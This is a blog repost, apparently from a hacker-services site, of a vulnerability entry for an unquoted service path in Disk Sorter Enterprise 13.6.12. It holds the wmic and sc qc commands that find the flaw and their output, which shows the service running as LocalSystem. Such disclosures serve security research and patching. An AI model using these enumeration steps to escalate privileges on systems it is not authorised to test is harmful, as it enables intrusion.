Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86380362

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path
# Discovery by: BRushiran
# Date: 15-06-2021
# Vendor Homepage: https://www.disksorter.com
# Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe
# Tested Version: 13.6.12
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Sorter Enterprise  Disk Sorter Enterprise    C:\Program Files\Disk
Sorter Enterprise\bin\disksrs.exe   Auto

C:\>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Disk Sorter Enterprise
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Sorter
Enterprise\bin\disksrs.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Disk Sorter Enterprise
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem